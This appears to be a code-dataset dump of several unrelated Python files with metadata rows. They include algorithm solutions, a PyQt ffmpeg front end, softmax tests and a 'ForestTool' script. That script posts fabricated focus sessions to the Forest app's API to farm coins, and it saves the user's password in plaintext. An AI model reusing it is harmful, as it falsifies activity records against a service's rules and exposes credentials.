elif n == 6:
return 'six'
elif n == 7:
return 'seven'
elif n == 8:
return 'eight'
elif n == 9:
return 'nine'
elif n == 10:
return 'ten'
elif n == 11:
return 'eleven'
elif n == 12:
return 'twelve'
elif n == 13:
return 'thirteen'
elif n == 14:
return 'fourteen'
elif n == 15:
return 'fifteen'
elif n == 16:
return 'sixteen'
elif n == 17:
return 'seventeen'
elif n == 18:
return 'eighteen'
# n = 19
return 'nineteen'
| 19.017241 | 61 | 0.507706 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 458 | 0.415231 |
eaac2ee80b3fe871703042e08987e0174fc49d74 | 919 | py | Python | hackerearth/Algorithms/Matt's Graph Book/solution.py | ATrain951/01.python-com_Qproject | c164dd093954d006538020bdf2e59e716b24d67c | [
"MIT"
] | 4 | 2020-07-24T01:59:50.000Z | 2021-07-24T15:14:08.000Z | hackerearth/Algorithms/Matt's Graph Book/solution.py | ATrain951/01.python-com_Qproject | c164dd093954d006538020bdf2e59e716b24d67c | [
"MIT"
] | null | null | null | hackerearth/Algorithms/Matt's Graph Book/solution.py | ATrain951/01.python-com_Qproject | c164dd093954d006538020bdf2e59e716b24d67c | [
"MIT"
] | null | null | null | """
# Sample code to perform I/O:
name = input() # Reading input from STDIN
print('Hi, %s.' % name) # Writing output to STDOUT
# Warning: Printing unwanted or ill-formatted data to output will cause the test cases to fail
"""
# Write your code here
import sys
from collections import defaultdict
sys.setrecursionlimit(100000)
def check(node, adjacency, seen):
seen[node] = True
for vertex in adjacency[node]:
if not seen[vertex]:
check(vertex, adjacency, seen)
n = int(input())
k = int(input())
edges = defaultdict(list)
for _ in range(k):
a, b = list(map(int, input().strip().split()))
edges[a].append(b)
edges[b].append(a)
x = int(input())
count = 0
visited = defaultdict(bool)
visited[x] = True
for i in range(n):
if not visited[i]:
count += 1
check(i, edges, visited)
print('Connected' if count == 1 else 'Not Connected')
| 22.975 | 94 | 0.634385 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 300 | 0.326442 |
eaaca7839f6bb2b2e2924a78a429e6572176117e | 361 | py | Python | python/863.all-nodes-distance-k-in-binary-tree.py | stavanmehta/leetcode | 1224e43ce29430c840e65daae3b343182e24709c | [
"Apache-2.0"
] | null | null | null | python/863.all-nodes-distance-k-in-binary-tree.py | stavanmehta/leetcode | 1224e43ce29430c840e65daae3b343182e24709c | [
"Apache-2.0"
] | null | null | null | python/863.all-nodes-distance-k-in-binary-tree.py | stavanmehta/leetcode | 1224e43ce29430c840e65daae3b343182e24709c | [
"Apache-2.0"
] | null | null | null | # Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
def distanceK(self, root, target, K):
"""
:type root: TreeNode
:type target: TreeNode
:type K: int
:rtype: List[int]
"""
| 21.235294 | 41 | 0.509695 | 188 | 0.520776 | 0 | 0 | 0 | 0 | 0 | 0 | 278 | 0.770083 |
eaad23f2b13bd298772ecacc2f6ab37c85b8ea24 | 64 | py | Python | downloader_cli/__version__.py | srevinsaju/downloader-cli | f03b2b38467a07134c2d06f5e81f744a8ba45d21 | [
"MIT"
] | 1 | 2020-12-18T21:16:05.000Z | 2020-12-18T21:16:05.000Z | downloader_cli/__version__.py | srevinsaju/downloader-cli | f03b2b38467a07134c2d06f5e81f744a8ba45d21 | [
"MIT"
] | null | null | null | downloader_cli/__version__.py | srevinsaju/downloader-cli | f03b2b38467a07134c2d06f5e81f744a8ba45d21 | [
"MIT"
] | null | null | null | """Contiain the version of the package"""
__version__ = "0.2.0"
| 21.333333 | 41 | 0.6875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 48 | 0.75 |
eaae0faf13f42080f43de9f7c7d0bd4f497fa5d8 | 13,343 | py | Python | apps/ffmpeg/ffmpeg_GUI.py | rboman/progs | c60b4e0487d01ccd007bcba79d1548ebe1685655 | [
"Apache-2.0"
] | 2 | 2021-12-12T13:26:06.000Z | 2022-03-03T16:14:53.000Z | apps/ffmpeg/ffmpeg_GUI.py | rboman/progs | c60b4e0487d01ccd007bcba79d1548ebe1685655 | [
"Apache-2.0"
] | 5 | 2019-03-01T07:08:46.000Z | 2019-04-28T07:32:42.000Z | apps/ffmpeg/ffmpeg_GUI.py | rboman/progs | c60b4e0487d01ccd007bcba79d1548ebe1685655 | [
"Apache-2.0"
] | 2 | 2017-12-13T13:13:52.000Z | 2019-03-13T20:08:15.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright 2019 Romain Boman
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import os
import subprocess
import re
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from ui_widget import Ui_Form
# ffmpeg -y -r 10 -i anim%4d.png -vf fps=25 -c:v libx264 -crf 18 -pix_fmt yuv420p video.mp4
class Window(QWidget, Ui_Form):
def __init__(self, parent=None):
super(Window, self).__init__(parent)
self.setupUi(self)
self.input_fps_lineEdit.setValidator(QIntValidator(0, 1000))
self.output_fps_lineEdit.setValidator(QIntValidator(0, 1000))
self.quality_Slider.setTickPosition(QSlider.TicksBothSides)
self.quality_Slider.setTickInterval(1)
self.quality_Slider.valueChanged.connect(
lambda i: QToolTip.showText(QCursor.pos(), "%d" % i))
# stdio redirection
self.stdout, sys.stdout = sys.stdout, self
# self.stderr, sys.stderr = sys.stderr, self
self.buf = ''
# images
self.pix = []
# read settings
settings = QSettings()
self.restoreGeometry(settings.value("Geometry", self.saveGeometry()))
self.ffmpegfolder_lineEdit.setText(settings.value("ffmpegfolder", ""))
self.workspace_lineEdit.setText(settings.value("workspace", ""))
self.filenames_lineEdit.setText(
settings.value("filenames", "anim%4d.png"))
self.outdir_lineEdit.setText(settings.value("outdir", ""))
self.outname_lineEdit.setText(
settings.value("outname", "video.mp4"))
self.input_fps_lineEdit.setText(settings.value("input_fps", "10"))
self.output_fps_lineEdit.setText(settings.value("output_fps", "25"))
self.quality_Slider.setValue(int(settings.value("quality", 19)))
iconfile = os.path.join(os.path.dirname(
__file__), '..', '..', 'ico', 'boomy-forward.png')
self.setWindowIcon(QIcon(iconfile))
def on_play_Button_pressed(self):
print("running ffplay...")
self.runPRG("ffplay")
def on_probe_Button_pressed(self):
print("running ffprobe...")
self.runPRG("ffprobe")
def runPRG(self, pname):
exeffplay = self.getExe(pname)
if not exeffplay:
QMessageBox.critical(
self, 'Error', '%s does not exist/work!\nCheck ffmpeg path.' % pname)
return
cmd = []
cmd.append(exeffplay)
outfile = os.path.join(self.outdir_lineEdit.text(),
self.outname_lineEdit.text())
if not os.path.isfile(outfile):
QMessageBox.critical(
self, 'Error', 'The video has not been generated yet!\n%s does not exist' % outfile)
return
cmd.append(outfile)
print('\t', cmd)
try:
retcode = subprocess.call(cmd)
print("\tretcode =", retcode)
except Exception as e:
print(e)
def on_check_Button_pressed(self):
print("folders:")
for p, f in [('ffmpeg', self.ffmpegfolder_lineEdit.text()),
('workspace', self.workspace_lineEdit.text()),
('output', self.outdir_lineEdit.text())]:
print("\t.", p, end=' ')
if not f:
print("empty")
if os.path.isdir(f):
print("exists!")
else:
print("doesn't exist!")
print("programs:")
for p in ['ffmpeg', 'ffplay', 'ffprobe']:
print("\t.", p, end=' ')
exe = self.getExe(p)
where = 'from PATH' if exe == p else 'from ffmpeg folder'
if exe:
print("found: %s (%s)" % (exe, where))
else:
print("NOT FOUND!")
if os.path.isdir(self.workspace_lineEdit.text()):
print("images:")
# convert sscanf format to regex: anim%4d.png => anim(\d{4}).png
regex = re.sub(
'(\\%(\\d)d)', '(\\\d{\\2})', self.filenames_lineEdit.text())
print("\t. pattern converted to regex:", regex)
pattern = re.compile(regex)
nofiles = 0
lowno = 0
highno = 0
self.pix = []
self.pixnames = []
for f in sorted(os.listdir(self.workspace_lineEdit.text())):
match = pattern.match(f)
if(match):
nofiles += 1
g = match.groups()
no = int(g[0])
highno = max(no, highno)
lowno = min(no, lowno)
self.pixnames.append(os.path.join(
self.workspace_lineEdit.text(), f))
print("\t. %d files found ranging from %d to %d" % (
nofiles, lowno, highno))
if len(self.pixnames):
progress = QProgressDialog(
"image", "Cancel", 0, len(self.pixnames), self)
progress.setWindowModality(Qt.WindowModal)
progress.setWindowTitle("Building preview...")
progress.setValue(0)
progress.forceShow()
for i, f in enumerate(self.pixnames):
progress.setValue(i+1)
progress.setLabelText(f)
if progress.wasCanceled():
self.pix = []
self.pixname = []
lowno = 0
highno = 100
break
img = QPixmap(f) # loads original image
# reduce img size if too large
w = min(img.width(), 500)
img_scaled = img.scaledToWidth(w, Qt.SmoothTransformation)
self.pix.append(img_scaled)
if len(self.pix):
self.img_Label.setPixmap(self.pix[0])
else:
self.img_Label.setText("No preview")
self.img_Slider.setMinimum(lowno)
self.img_Slider.setMaximum(highno)
def on_img_Slider_valueChanged(self):
no = self.img_Slider.value()
QToolTip.showText(QCursor.pos(), "%d" % no)
#print "slider =",no
if len(self.pix) > no:
self.img_Label.setPixmap(self.pix[no])
def checkExe(self, exe):
try:
# try to call it (with a dummy arg - faster than -h)
with open(os.devnull, 'w') as FNULL:
subprocess.call([exe, '-prout'], stdout=FNULL,
stderr=subprocess.STDOUT)
return exe
except OSError:
return ""
def getExe(self, exename):
# try the provided folder name
if self.ffmpegfolder_lineEdit.text():
exeinfolder = os.path.join(
self.ffmpegfolder_lineEdit.text(), exename)
exe = self.checkExe(exeinfolder)
if exe:
return exe
# try ffmpeg in the PATH
return self.checkExe(exename)
def on_convert_Button_pressed(self):
exeffmpeg = self.getExe("ffmpeg")
if not exeffmpeg:
QMessageBox.critical(
self, 'Error', 'ffmpeg does not exist/work!\nCheck ffmpeg path.')
cmd = []
cmd.append(exeffmpeg)
cmd.append('-y')
# cmd +="-r %s " %
cmd.extend(['-r', self.input_fps_lineEdit.text()])
# check workspace folder
wrkdir = self.workspace_lineEdit.text()
if not os.path.isdir(wrkdir):
QMessageBox.critical(
self, 'Error', 'The workspace folder does not exist!')
return
inpfiles = os.path.join(
self.workspace_lineEdit.text(), self.filenames_lineEdit.text())
#cmd +="-i %s " % inpfiles
cmd.extend(['-i', inpfiles])
#cmd +="-vf fps=%s " % self.output_fps_lineEdit.text()
cmd.extend(['-vf', 'fps=%s' % self.output_fps_lineEdit.text()])
#cmd +="-c:v libx264 "
cmd.extend(['-c:v', 'libx264'])
#cmd +="-crf %d " % self.quality_Slider.value()
cmd.extend(['-crf', '%d' % self.quality_Slider.value()])
#cmd +="-pix_fmt yuv420p "
cmd.extend(['-pix_fmt', 'yuv420p'])
# cmd +="-vf \"scale=trunc(iw/2)*2:trunc(ih/2)*2\" " # scale if not multiple of 2
#cmd +="-vf \"scale=trunc(iw/2)*2:trunc(ih/2)*2, setsar=1\" "
# cmd +="-vf \"crop=trunc(iw/2)*2:trunc(ih/2)*2:0:0\" " # crop to odd dimensions...
cmd.extend(['-vf', 'crop=trunc(iw/2)*2:trunc(ih/2)*2:0:0'])
# check output folder
outdir = self.outdir_lineEdit.text()
if not os.path.isdir(outdir):
QMessageBox.critical(
self, 'Error', 'The output folder does not exist!')
return
# check / correct output filename
outname = self.outname_lineEdit.text()
if outname == '':
outname = 'video.mp4'
base, ext = os.path.splitext(outname)
if(ext != '.mp4'):
outname = outname+'.mp4'
self.outname_lineEdit.setText(outname)
# check whether output file will be overwritten
outfile = os.path.join(self.outdir_lineEdit.text(),
self.outname_lineEdit.text())
if os.path.isfile(outfile):
reply = QMessageBox.question(self, 'Message',
"The output file already exists. Do you want to overwrite it?",
QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
if reply == QMessageBox.No:
print("output file exists - operation cancelled.")
return
cmd.append(outfile)
print("running ffmpeg...")
print('\t', cmd)
# sous linux, cmd doit etre une liste a moins que shell=True (pas safe)
# dans ce cas, python se charge d'ajouter des guillemets là ou il faut.
# sous windows, ca marche sans shell=True avec une bete string.
# => on utilise une liste
retcode = subprocess.call(cmd)
print("\tretcode =", retcode)
def on_ffmpegfolder_Button_pressed(self):
dir = QFileDialog.getExistingDirectory(
self, "Find ffmpeg folder", self.ffmpegfolder_lineEdit.text())
if dir:
self.ffmpegfolder_lineEdit.setText(QDir.toNativeSeparators(dir))
def on_workspace_Button_pressed(self):
dir = QFileDialog.getExistingDirectory(
self, "Find workspace folder", self.workspace_lineEdit.text())
if dir:
self.workspace_lineEdit.setText(QDir.toNativeSeparators(dir))
def on_outdir_Button_pressed(self):
dir = QFileDialog.getExistingDirectory(
self, "Choose output folder", self.outdir_lineEdit.text())
if dir:
self.outdir_lineEdit.setText(QDir.toNativeSeparators(dir))
def closeEvent(self, event):
# save settings to registry
settings = QSettings()
settings.setValue("Geometry", QVariant(self.saveGeometry()))
settings.setValue("ffmpegfolder", QVariant(
self.ffmpegfolder_lineEdit.text()))
settings.setValue("workspace", QVariant(
self.workspace_lineEdit.text()))
settings.setValue("filenames", QVariant(
self.filenames_lineEdit.text()))
settings.setValue("outdir", QVariant(
self.outdir_lineEdit.text()))
settings.setValue("outname", QVariant(
self.outname_lineEdit.text()))
settings.setValue("input_fps", QVariant(
self.input_fps_lineEdit.text()))
settings.setValue("output_fps", QVariant(
self.output_fps_lineEdit.text()))
settings.setValue("quality", QVariant(self.quality_Slider.value()))
event.accept()
def write(self, stuff):
"stdio redirection"
if '\n' in stuff:
list(map(self.writeLine, stuff.split("\n")))
else:
self.buf += stuff
qApp.processEvents()
def flush(self): # required by py3 stdout redirection
pass
def writeLine(self, stuff):
"stdio redirection"
if len(self.buf):
stuff = self.buf + stuff
self.buf = ''
self.textEdit.append(stuff)
else:
if stuff != '':
self.textEdit.append(stuff)
def main():
app = QApplication(sys.argv)
app.setOrganizationName("RoBo")
app.setApplicationName("ffmpeg_GUI")
win = Window()
win.setWindowTitle('%s' % os.path.basename(sys.argv[0]))
win.show()
app.lastWindowClosed.connect(app.quit)
sys.exit(app.exec_())
if __name__ == "__main__":
main()
| 36.859116 | 104 | 0.561643 | 12,110 | 0.907524 | 0 | 0 | 0 | 0 | 0 | 0 | 3,281 | 0.245878 |
eaae12f421ef051bdaca1bac1d8f9528a09f72e1 | 4,036 | py | Python | tests/nn/softmax_test.py | kbrodt/tor4 | d09740b746c534e67a72f492c7c03654f5888a46 | [
"MIT"
] | null | null | null | tests/nn/softmax_test.py | kbrodt/tor4 | d09740b746c534e67a72f492c7c03654f5888a46 | [
"MIT"
] | null | null | null | tests/nn/softmax_test.py | kbrodt/tor4 | d09740b746c534e67a72f492c7c03654f5888a46 | [
"MIT"
] | null | null | null | import numpy as np
import tor4
import tor4.nn as nn
def test_softmax():
a = tor4.tensor(data=[0, 0, 0.0])
a_sm = nn.functional.softmax(a, dim=0)
assert not a_sm.requires_grad
assert a_sm.tolist() == [1 / 3, 1 / 3, 1 / 3]
def test_softmax2():
a = tor4.tensor(data=[[0, 0, 0], [0, 0, 0.0]])
a_sm0 = nn.functional.softmax(a, dim=0)
a_sm1 = nn.functional.softmax(a, dim=1)
assert not a_sm0.requires_grad
assert a_sm0.tolist() == [[1 / 2, 1 / 2, 1 / 2], [1 / 2, 1 / 2, 1 / 2]]
assert not a_sm1.requires_grad
assert a_sm1.tolist() == [[1 / 3, 1 / 3, 1 / 3], [1 / 3, 1 / 3, 1 / 3]]
def test_softmax_backward():
a = tor4.tensor(data=[0, 0, 0.0], requires_grad=True)
a_sm = nn.functional.softmax(a, dim=-1)
a_sm.backward(tor4.tensor([1, 1, 1.0]))
assert a_sm.requires_grad
assert a_sm.tolist() == [1 / 3, 1 / 3, 1 / 3]
assert a.grad.tolist() == [0, 0, 0]
def test_softmax_backward2():
a = tor4.tensor(data=[0, 0, 0.0], requires_grad=True)
a_sm = nn.functional.softmax(a, dim=-1)
a_sm.backward(tor4.tensor([0, 1, -1.0]))
assert a_sm.requires_grad
assert a_sm.tolist() == [1 / 3, 1 / 3, 1 / 3]
assert a.grad.tolist() == [0, 1 / 3, -1 / 3]
def test_softmax2d_backward():
a = tor4.tensor(data=[[0, 1, -1.0], [1, -2, 3]], requires_grad=True)
a_sm = nn.functional.softmax(a, dim=-1)
a_sm.backward(tor4.tensor([[1, 1, 1.0], [1, 1, 1]]))
assert a_sm.requires_grad
assert np.allclose(
a_sm.tolist(),
[[0.2447, 0.6652, 0.09], [0.1185, 0.0059, 0.8756]],
atol=1e-4,
rtol=1e-4,
)
assert np.allclose(a.grad.tolist(), [[0, 0, 0], [0, 0, 0]])
def test_softmax2d_backward2():
a = tor4.tensor(data=[[0, 1, -1.0], [1, -2, 3]], requires_grad=True)
a_sm = nn.functional.softmax(a, dim=0)
a_sm.backward(tor4.tensor([[1, 1, 1.0], [1, 1, 1]]))
assert a_sm.requires_grad
assert np.allclose(
a_sm.tolist(),
[[0.2689, 0.9526, 0.018], [0.7311, 0.0474, 0.982]],
atol=1e-4,
rtol=1e-4,
)
assert np.allclose(a.grad.tolist(), [[0, 0, 0], [0, 0, 0]])
def test_softmax2d_backward3():
a = tor4.tensor(data=[[0, 1, -1.0], [1, -2, 3]], requires_grad=True)
a_sm = nn.functional.softmax(a, dim=-1)
a_sm.backward(tor4.tensor([[0, -1, 1.0], [2, 0, -1]]))
assert a_sm.requires_grad
assert np.allclose(
a_sm.tolist(),
[[0.2447, 0.6652, 0.09], [0.1185, 0.0059, 0.8756]],
atol=1e-4,
rtol=1e-4,
)
assert np.allclose(
a.grad.tolist(),
[[0.1408, -0.2826, 0.1418], [0.3127, 0.0038, -0.3164]],
atol=1e-4,
rtol=1e-4,
)
def test_softmax2d_backward4():
a = tor4.tensor(data=[[0, 1, -1.0], [1, -2, 3]], requires_grad=True)
a_sm = nn.functional.softmax(a, dim=0)
a_sm.backward(tor4.tensor([[-5, 3, 0.0], [0, 0, 1]]))
assert a_sm.requires_grad
assert np.allclose(
a_sm.tolist(),
[[0.2689, 0.9526, 0.018], [0.7311, 0.0474, 0.982]],
atol=1e-4,
rtol=1e-4,
)
assert np.allclose(
a.grad.tolist(),
[[-0.9831, 0.1355, -0.0177], [0.9831, -0.1355, 0.0177]],
atol=1e-4,
rtol=1e-4,
)
def test_softmax3d_backward():
a = tor4.tensor(
data=[[[0, 1, -1.0], [1, -2, 3]], [[1, 4, -2], [0, 0, -3]]], requires_grad=True,
)
a_sm = nn.functional.softmax(a, dim=1)
a_sm.backward(tor4.tensor([[[-5, 3, 0.0], [0, 0, 1]], [[3, 0, -3], [1, 2, 3]]]))
assert a_sm.requires_grad
assert np.allclose(
a_sm.tolist(),
[
[[0.2689, 0.9526, 0.018], [0.7311, 0.0474, 0.982]],
[[0.7311, 0.982, 0.7311], [0.2689, 0.018, 0.2689]],
],
atol=1e-4,
rtol=1e-4,
)
assert np.allclose(
a.grad.tolist(),
[
[[-0.9831, 0.1355, -0.0177], [0.9831, -0.1355, 0.0177]],
[[0.3932, -0.0353, -1.1797], [-0.3932, 0.0353, 1.1797]],
],
atol=1e-4,
rtol=1e-4,
)
| 28.422535 | 88 | 0.529485 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
eaae13d630098d1fed2c11aa237be653fb511af0 | 8,316 | py | Python | ForestTool(Python2)/Main.py | paltis5212/ForestTool | d49026c257c88e994c8b568906ae57500d71778b | [
"MIT"
] | 9 | 2019-05-11T04:42:22.000Z | 2022-03-05T03:54:19.000Z | ForestTool(Python2)/Main.py | paltis5212/ForestTool | d49026c257c88e994c8b568906ae57500d71778b | [
"MIT"
] | 4 | 2019-06-03T12:15:47.000Z | 2022-02-27T15:11:16.000Z | ForestTool(Python2)/Main.py | SmileZXLee/ForestTool | 9becb37298b86409b8ef7196969391078e39b902 | [
"MIT"
] | 8 | 2019-11-26T09:52:13.000Z | 2022-02-27T14:38:54.000Z | #coding=utf-8
__author__ = 'zxlee'
__github__ = 'https://github.com/SmileZXLee/forestTool'
import json
import time
import HttpReq
from User import User
from datetime import datetime,timedelta
import sched
import sys
import os
import platform
from dateutil.parser import parse
#是否是Windows
os_is_windows = platform.system() == 'Windows'
#种植成功时间
global plant_succ_time
plant_succ_time = datetime.now()
#程序入口
def main():
print(u'欢迎使用ForestTool')
try:
with open('user_login.txt', 'r') as f:
user_login_list = f.readlines()
if len(user_login_list) == 2:
s_account = user_login_list[0].strip('\n')
s_pwd = user_login_list[1].strip('\n')
login_input = {'account':s_account,'pwd':s_pwd}
else:
login_input = get_login()
except IOError:
login_input = get_login()
login(login_input)
#根据系统获取raw_input中文编码结果
def gbk_encode(str):
if os_is_windows:
return str.decode('utf-8').encode('gbk')
else:
return str
#获取用户输入的账号和密码
def get_login():
account = raw_input(gbk_encode('请输入您的账号: ')).decode(sys.stdin.encoding)
pwd = raw_input(gbk_encode('请输入您的密码: ')).decode(sys.stdin.encoding)
return {'account':account,'pwd':pwd}
#获取批量植树功能的用户选择信息
def get_add_time():
add_time = raw_input(gbk_encode('请输入专注时间(分钟): '))
tree_type = raw_input(gbk_encode('请选择植物类型【1.开花的树 2.树屋 3.鸟巢 4.柠檬树 5.三兄弟 6.树丛 7.章鱼 8.樱花 9.椰子树 10.猫咪 11.一株很大的草 12.中国松 13.仙人掌球 14.南瓜 15.稻草人 16.圣诞树 17.中国新年竹 18.蘑菇 19.仙人掌 20.银杏 21.紫藤 22.西瓜 23.竹子 24.糖果树 25.向日葵 26.玫瑰 27.枫树 28.面包树 29.大王花 30.香蕉】,无论是否已购买都可以种植,超出30的植物有兴趣可以自行测试: ')).decode(sys.stdin.encoding)
note = raw_input(gbk_encode('请输入此任务备注: ')).decode(sys.stdin.encoding)
add_count = raw_input(gbk_encode('请输入批量植树数量: ')).decode(sys.stdin.encoding)
return {'add_time':add_time,'tree_type':tree_type,'note':note,'add_count':add_count}
#获取刷金币功能的用户选择信息
def get_coin_task():
add_time = raw_input(gbk_encode('请输入每棵树种植时间(分钟)【5-120分钟,每5分钟一阶段,每增加1阶段多1金币,第一阶段2金币】: ')).decode(sys.stdin.encoding)
tree_type = raw_input(gbk_encode('请选择植物类型【1.开花的树 2.树屋 3.鸟巢 4.柠檬树 5.三兄弟 6.树丛 7.章鱼 8.樱花 9.椰子树 10.猫咪 11.一株很大的草 12.中国松 13.仙人掌球 14.南瓜 15.稻草人 16.圣诞树 17.中国新年竹 18.蘑菇 19.仙人掌 20.银杏 21.紫藤 22.西瓜 23.竹子 24.糖果树 25.向日葵 26.玫瑰 27.枫树 28.面包树 29.大王花 30.香蕉】,无论是否已购买都可以种植,超出30的植物有兴趣可以自行测试: ')).decode(sys.stdin.encoding)
note = raw_input(gbk_encode('请输入此任务备注: ')).decode(sys.stdin.encoding)
return {'add_time':add_time,'tree_type':tree_type,'note':note}
#获取刷金币功能的用户选择信息
def get_dis_add():
start_time = raw_input(gbk_encode('请输入开始时间(格式:\'2019-01-01/11:11:11\'): ')).decode(sys.stdin.encoding)
end_time = raw_input(gbk_encode('请输入结束时间(格式:\'2019-01-01/11:11:11\'): ')).decode(sys.stdin.encoding)
tree_type = raw_input(gbk_encode('请选择植物类型【1.开花的树 2.树屋 3.鸟巢 4.柠檬树 5.三兄弟 6.树丛 7.章鱼 8.樱花 9.椰子树 10.猫咪 11.一株很大的草 12.中国松 13.仙人掌球 14.南瓜 15.稻草人 16.圣诞树 17.中国新年竹 18.蘑菇 19.仙人掌 20.银杏 21.紫藤 22.西瓜 23.竹子 24.糖果树 25.向日葵 26.玫瑰 27.枫树 28.面包树 29.大王花 30.香蕉】,无论是否已购买都可以种植,超出30的植物有兴趣可以自行测试: ')).decode(sys.stdin.encoding)
note = raw_input(gbk_encode('请输入此任务备注: ')).decode(sys.stdin.encoding)
return {'start_time':start_time,'end_time':end_time,'tree_type':tree_type,'note':note}
#获取用户选择菜单的信息
def get_mode():
mode_input = raw_input(gbk_encode('请选择您要进行的操作: 1.自动刷金币 2.批量植树 3.根据时间区间植树 4.使用其他账号登录 5.退出ForestTool: ')).decode(sys.stdin.encoding)
return mode_input
#前往菜单
def to_menu(user):
while(True):
mode_input = get_mode()
if mode_input == '1':
add_coin_task(user)
break
elif mode_input == '2':
add_time(user)
break
elif mode_input == '3':
add_dis_time(user)
break
elif mode_input == '4':
login(get_login())
break
elif mode_input == '5':
exit(0)
break
else:
print(u'您的输入不合法,请输入选择!!')
#用户登录
def login(login_input):
post_json = {
'session':{
'email':login_input['account'],
'password':login_input['pwd'],
},
'seekruid':''
}
print(u'正在登录,请稍后...')
res = HttpReq.send_req('https://c88fef96.forestapp.cc/api/v1/sessions',{},post_json,'','POST')
if res.has_key('remember_token'):
user = User(res['user_name'],res['user_id'],res['remember_token'])
print (u'登录成功!!欢迎您,'+ res['user_name'])
try:
with open('user_login.txt', 'w') as f:
f.write(login_input['account']+'\n')
f.write(login_input['pwd']+'\n')
except IOError:
print(u'IO异常,无法保存账号密码')
to_menu(user)
else:
print(u'登录失败,账号或密码错误,请重新输入!!')
login(get_login())
#批量植树功能
def add_time(user):
add_time_input = get_add_time()
add_time_data = int(add_time_input['add_time'])
tree_type = int(add_time_input['tree_type'])
print(u'正在执行,请稍后...')
note = add_time_input['note']
add_count = int(add_time_input['add_count'])
curr_count = 0
while curr_count<add_count:
curr_count = curr_count+1
add_per_time(add_time_data,note,tree_type,user,curr_count,'','')
time.sleep(1)
to_menu(user)
#种植一棵树
def add_per_time(add_time_data,note,tree_type,user,per_add_count,start_time,end_time):
time_now = datetime.now()
time_now = time_now - timedelta(hours = 8)
time_pass = time_now - timedelta(minutes = add_time_data)
if len(start_time):
s_start_time = start_time
else:
s_start_time = time_pass.isoformat()
if len(end_time):
s_end_time = end_time
else:
s_end_time = time_now.isoformat()
post_json = {
"plant": {
"end_time": s_end_time,
"longitude": 0,
"note": note,
"is_success": 1,
"room_id": 0,
"die_reason": '',
"tag": 0,
"latitude": 0,
"has_left": 0,
"start_time": s_start_time,
"trees": [{
"phase": 4,
"theme": 0,
"is_dead": 0,
"position": -1,
"tree_type": tree_type
}]
},
"seekruid": str(user.user_id)
}
print(u'植树中,请稍后...')
post_res = HttpReq.send_req('https://c88fef96.forestapp.cc/api/v1/plants',{},post_json,user.remember_token,'POST')
if not post_res.has_key('id'):
print(u'植树失败!!返回信息:'+post_res)
else:
get_res = HttpReq.send_req('https://c88fef96.forestapp.cc/api/v1/plants/updated_plants?seekruid='+ str(user.user_id)+'&update_since='+time_now.isoformat()+'/',{},'',user.remember_token,'GET')
now_time = datetime.now()
print(u'【%s】第%d棵树种植成功!!'%(now_time.strftime("%Y-%m-%d %H:%M:%S"),per_add_count))
global plant_succ_time
plant_succ_time = now_time;
#刷金币功能
def add_coin_task(user):
get_coin_input = get_coin_task()
add_time = int(get_coin_input['add_time'])
tree_type = get_coin_input['tree_type']
note = get_coin_input['note']
get_res = HttpReq.send_req('https://c88fef96.forestapp.cc/api/v1/users/'+str(user.user_id)+'/coin?seekruid='+ str(user.user_id),{},'',user.remember_token,'GET')
if get_res.has_key('coin'):
print(u'您当前金币数:'+str(get_res['coin']))
print(u'开始自动刷金币,每%d分钟植一棵树...'%add_time)
total_time = 0
curr_count = 1
while True:
if curr_count == 1 or (not total_time == 0 and total_time % (add_time * 60) == 0):
add_per_time(add_time,note,tree_type,user,curr_count,'','')
curr_count = curr_count+1
get_res_sub = HttpReq.send_req('https://c88fef96.forestapp.cc/api/v1/users/'+str(user.user_id)+'/coin?seekruid='+ str(user.user_id),{},'',user.remember_token,'GET')
print(u'您当前金币数:'+str(get_res_sub['coin'])+u'(赚得金币数:'+str(get_res_sub['coin']-get_res['coin'])+')')
global plant_succ_time
total_time = int((datetime.now()-plant_succ_time).total_seconds())
if not total_time == add_time * 60:
sys.stdout.write('\r'+u'距离下一棵树种植时间 :' + str(add_time * 60 - total_time).zfill(len(str(add_time * 60))),)
sys.stdout.flush()
if total_time == add_time * 60:
print('')
time.sleep(1)
#根据时间区间种植树
def add_dis_time(user):
get_dis_input = get_dis_add()
start_time = parse(get_dis_input['start_time'])
end_time = parse(get_dis_input['end_time'])
tree_type = get_dis_input['tree_type']
note = get_dis_input['note']
s_start_time = start_time
s_start_time = s_start_time - timedelta(hours = 8)
end_time = end_time - timedelta(hours = 8)
curr_count = 0
while True:
curr_count = curr_count+1
add_per_time(10,note,tree_type,user,curr_count,s_start_time.isoformat(),(s_start_time + timedelta(minutes = 10)).isoformat())
s_start_time = s_start_time + timedelta(minutes = 10,seconds = 1)
print('下一棵树对应需求时间:'+(s_start_time + timedelta(hours = 8)).strftime("%Y-%m-%d %H:%M:%S"))
if int((end_time - s_start_time).total_seconds()) < 10:
print(u'执行完毕!!')
break;
time.sleep(1)
main()
| 34.65 | 298 | 0.69252 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 4,125 | 0.415324 |
eaae876c415d71773fc2a99edab6f478ae373366 | 1,207 | py | Python | samples/sendRps.py | vsgobbi/Nfse-python | 5b2334e9e28e07186e8d38cda2ff7fe6ce62885d | [
"Python-2.0",
"OLDAP-2.7"
] | null | null | null | samples/sendRps.py | vsgobbi/Nfse-python | 5b2334e9e28e07186e8d38cda2ff7fe6ce62885d | [
"Python-2.0",
"OLDAP-2.7"
] | 1 | 2021-12-13T20:09:32.000Z | 2021-12-13T20:09:32.000Z | samples/sendRps.py | vsgobbi/Nfse-python | 5b2334e9e28e07186e8d38cda2ff7fe6ce62885d | [
"Python-2.0",
"OLDAP-2.7"
] | null | null | null | # -*- coding: utf-8 -*-
from services.Services import Services
# NFSe Provider
taxId = "87654321000198"
